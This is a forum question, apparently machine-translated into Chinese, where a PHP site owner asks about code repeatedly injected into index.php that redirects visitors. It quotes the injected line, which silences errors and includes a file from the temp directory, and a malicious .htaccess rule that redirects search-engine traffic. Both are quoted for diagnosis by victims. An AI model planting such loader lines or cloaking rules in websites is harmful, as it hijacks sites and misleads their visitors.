我有一个php项目,我看到index.php页面一直被黑客攻击
每次在index.php页面顶部自动添加一些代码,每当我点击任何地方时,我的网站都会被重定向到第三方网址。
注入的代码如下:
error_reporting(0); ini_set(“display_errors”,0); include_once(sys_get_temp_dir()。“/ SESS_48cd7517d21176f980daa5502d9efb31”)
答案 0 :(得分:0)
我认为它包含会话文件。检查SESS_48cd7517d21176f980daa5502d9efb31文件包含的内容。
答案 1 :(得分:0)
我也遇到了同样的问题。
所有INDEX.PHP文件都注入了完全相同的代码。
所有.htaccess文件都受到了以下行为:
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^.*$ index.php [L]
</IfModule>
点击Google搜索结果中的链接将被重定向到色情网站。